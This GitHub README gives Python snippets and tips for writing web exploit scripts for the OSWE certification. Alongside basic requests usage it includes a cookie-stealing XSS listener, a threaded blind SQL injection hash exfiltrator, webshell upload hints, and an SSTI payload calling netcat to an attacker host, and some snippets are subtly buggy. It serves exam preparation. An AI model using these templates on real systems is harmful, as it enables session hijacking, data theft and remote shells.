Skip to content

Latest commit

 

History

History
551 lines (401 loc) · 18.2 KB

README.md

File metadata and controls

551 lines (401 loc) · 18.2 KB

Exploit Writing for OSWE

Background

What

This repository contains a list of useful snippets and tips that pertain to the writing of exploit scripts in the OSWE labs and certification exam.

Some examples here may go against certain coding practices, but our end goal is to write the exploit script fast and correct.

The Code Snippets section is a great place to start if you are not experienced in using the requests library or are new to Python. Otherwise, feel free to skip to the Reusable Code section or the Tips section.

Why

  • While there are many write-ups, reviews, and notes on the certification, few resources specifically focus on the process of writing exploits.
  • Writing the exploit script can be daunting, especially for those who are new to Python or have little experience interacting with web applications through code.
  • Time spent on identifying vulnerabilities and documenting an exam report can fluctuate considerably, but the time spent on developing the exploit script can be minimized and kept constant if mastered well.

Table of Contents


Code Snippets

Starting Template

import requests

def main():
    print("Hello World!")

if __name__ == __main__:
    main()

Useful imports

# For sending HTTP requests
import requests

# For Base64 encoding/decoding
from base64 import b64encode, b64decode, urlsafe_b64encode, urlsafe_b64decode

# For getting current time or for calculating time delays
from time import time

# For regular expressions
import re

# For running shell commands
import subprocess

# For multithreading
from concurrent.futures import ThreadPoolExecutor

# For running a HTTP server in the background
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler

# For parsing HTTP cookies
from http import cookies

# For getting command-line arguments
import sys

Using the requests library

Sending the simplest HTTP request

resp_obj = requests.get("https://github.com")

Specifying different HTTP methods

# GET method
requests.get("https://github.com")

# POST method
requests.post("https://github.com")

# PUT method
requests.put("https://github.com")

# PATCH method
requests.patch("https://github.com")

# DELETE method
requests.delete("https://github.com")

Reading the HTTP response

resp_obj = requests.get("https://github.com")

# HTTP status code (e.g 404, 500, 301)
resp_obj.status_code

# HTTP response headers (e.g Location, Content-Disposition)
resp_obj.headers["Location"]

# Body as bytes
resp_obj.content

# Body as a string
resp_obj.text

# Body as a dictionary (if body is a JSON)
resp_obj.json()

Sending data as a query string in the URL (Using params argument)

params = {
    "foo": "bar"
}

requests.get("https://github.com", params=params)

Sending data as a query string in the body (Using data argument)

data = {
    "foo": "bar"
}

requests.post("https://github.com", data=data)

Sending data as a JSON in the body (Using json argument)

data = {
    "foo": "bar"
}

requests.post("https://github.com", json=data)

Sending a file in the body (Using files argument)

files = {
    #                (FILE_NAME, FILE_CONTENTS, FILE_MIMETYPE)
    "uploaded_file": ("phpinfo.php", b"<?php phpinfo() ?>", "application/x-httpd-php")
}

requests.post("https://github.com", files=files)

Setting HTTP headers (Using headers argument)

headers = {
    "X-Forwarded-For": "127.0.0.1"
}

requests.get("https://github.com", headers=headers)

Setting HTTP cookies (Using cookies argument)

cookies = {
    "PHPSESSID": "fakesession"
}

requests.get("https://github.com", cookies=cookies)

Disabling following of 3XX redirects (Using allow_redirects argument)

requests.post("https://github.com/login", allow_redirects=False)

Interacting with an unverified HTTPS server (Using verify argument)

# Supresses InsecureRequestWarning messages
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

requests.get("https://github.com", verify=False)

Sending request through a HTTP proxy (Using proxies argument)

proxies = {
    "HTTP": "http://127.0.0.1:8080",
    "HTTPS": "http://127.0.0.1:8080"
}

requests.get("https://github.com", proxies=proxies)

Creating a Session

session = requests.Session()
session.get("https://github.com")

Setting persistent cookies

session = requests.Session()
session.cookies.update({"PHPSESSID": "fakesession"})

Setting persistent headers

session = requests.Session()
session.headers["Authorization"] = "Basic 123"

Troubleshooting

Use Wireshark and filter for HTTP requests

  1. Open Wireshark
  2. Select the VPN interface (e.g tun0)
  3. Enter http into the filter bar.

Print contents of the HTTP request

data = {
    "foo": "bar"
}
resp_obj = requests.post("https://github.com", data=data)
prepared_request = resp_obj.request

print("Method:\n", prepared_request.method)
print()
print("URL:\n", prepared_request.url)
print()
print("Headers:\n", prepared_request.headers)
print()
print("Body:\n", prepared_request.body)

Proxy HTTP request through Burp Suite and inspect

  1. Open Burp Suite
  2. Navigate to "Proxy" Tab and set "Intercept" to "On".

Reusable code

Serving files via HTTP

LHOST      = "10.0.0.1"
WEB_PORT   = 8000
JS_PAYLOAD = "<script>alert(1)</script>"

def start_web_server():
    class MyHandler(BaseHTTPRequestHandler):
        # Uncomment this method to suppress HTTP logs
        # def log_message(self, format, *args):
        #     return

        def do_GET(self):
            if self.path.endswith('/payload.js'):
                self.send_response(200)
                self.send_header("Content-Type", "application/javascript")
                self.send_header("Content-Length", str(len(JS_PAYLOAD)))
                self.end_headers()
                self.wfile.write(JS_PAYLOAD.encode())
            
    httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
    threading.Thread(target=httpd.serve_forever).start()

start_web_server()

Stealing HTTP cookies

LHOST      = "10.0.0.1"
WEB_PORT   = 8000

requests = requests.Session()
xss_event = threading.Event() # Signifies when victim sends their cookie

def send_xss_payload():
    pass

def start_web_server():
    class MyHandler(BaseHTTPRequestHandler):

        def do_GET(self):
            self.send_response(200)
            self.end_headers()

            # Load stolen cookie into session
            _, enc_cookie = self.path.split("/?cookie=", 1)
            plain_cookie = urlsafe_b64decode(enc_cookie).decode()
            session.cookies["PHPSESSID"] = cookies.SimpleCookie(plain_cookie)["PHPSESSID"]

            xss_event.set() # Trigger the event
            
    httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
    threading.Thread(target=httpd.serve_forever).start()

start_web_server()
send_xss_payload()
xss_event.wait() # Wait for event to be triggered
print("[+] Stolen cookie:", session.cookies["PHPSESSID"])

Speeding up SQL injections

MAX_WORKERS = 20
HASH_LENGTH = 32

def exfiltrate_hash():

    def boolean_sqli(arguments):
        idx, ascii_val = arguments
        # ...
        # Perform SQLi and store boolean outcome into truth
        # ...
        return ascii_val, truth

    result = ""

    # Go through each character position
    for idx in range(HASH_LENGTH):

        # Use MAX_WORKERS threads to test possible ASCII values in parallel
        with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            # Pass each of (0, 32), (0, 33) ..., (0, 126) as an argument to boolean_sqli()
            responses = executor.map(boolean_sqli, [(idx, ascii_val) for ascii_val in range(32, 126)])

        # Go through each response and determine which ASCII value is correct
        for ascii_val, truth in responses:
            if truth:
                result += chr(ascii_val)
                break
    
    return result

hash = exfiltrate_hash()

Tips

Perform a sanity check after every HTTP request using assert

  • Catch whether a webshell is indeed uploaded before attempting to trigger it
  • Catch whether authentication is sucessful before exploiting authenticated features

Example:

# Suppose 302 is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data, allow_redirect=False)
assert resp_obj.status_code == 302, "Login not successful"

# Suppose admin page is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data)
assert "Admin Dashboard" in resp_obj.content, "Login not successful"

Print meaning messages after each step

  • Action being started/finished OR
  • Cookies/tokens/files/values that were retrieved

Example:

[+] Parsed command-line arguments and got:
  * BASE_URL: http://example.com
  * LHOST:    127.0.0.1
  * LPORT:    1337
[+] Triggered password reset token generation
[=] Getting password reset token length...
[+] Got password reset token length: 10
[=] Retrieving password reset token...
[+] Got password reset token: FAKE_TOKEN

Separate each exploitation step into its own function

Example:

def register():
    pass

def login():
    pass

def rce():
    pass

Create a global Session object so it does not need to be explictly passed to each function call

session = requests.Session()

def login():
    session.post(...)

def rce():
    session.post(...)

Create a global BASE_URL string and construct the required URLs from it

BASE_URL = ""
session = requests.Session()

def login():
    url = BASE_URL + "/login"
    session.post(url, ...)

def rce():
    url = BASE_URL + "/rce"
    session.post(url, ...)

def main():
    # Allow BASE_URL to be modified
    global BASE_URL
    BASE_URL = sys.argv[1]
...

To force all HTTP requests to go through Burp Suite without the use of the proxies argument , set the HTTP_PROXY / HTTPS_PROXY environment variable when running

$ HTTP_PROXY=http://127.0.0.1:8080 python3 poc.py

Apply encoding/decoding scheme(s) to enable safe transmission of payloads

  • Base64
  • Hexadecimal

Use """ to create the payload string if it contains both single (') and double quotes (")

Example:

payload = """This is a '. This is a "."""

Speed up SQL injections using multithreading

See Speed up SQL Injections.

Hardcode an authenticated user's cookie when developing exploits for authenticated features

Especially if a lot of time-consuming steps had to be done to obtain an authenticated session

Example:

session = requests.Session()

def main():
    # Skipping these for now...
    # register()
    # login()

    # TODO: Delete this line after you are
    # done developing and uncomment the above steps!
    session.cookies["JSESSIONID"] = "ADMIN_COOKIE"

    # Exploit authenticated features...
...

Avoid using f-strings (f"") or str.format if the payload contains too many curly braces ({})

Doubling each curly brace just to escape them can be troublesome and error-prone. Instead use simple placeholders and do a .replace()!

Example:

# Too many curly braces
ssti_payload = f"{{{{ __import__('os').system('nc {LHOST} {LPORT}') }}}}"
# Much easier to read
ssti_payload = "{{ __import__('os').system('nc <LHOST> <LPORT>') }}"\
    .replace("<LHOST>", LHOST)\
    .replace("<LPORT>", LPORT)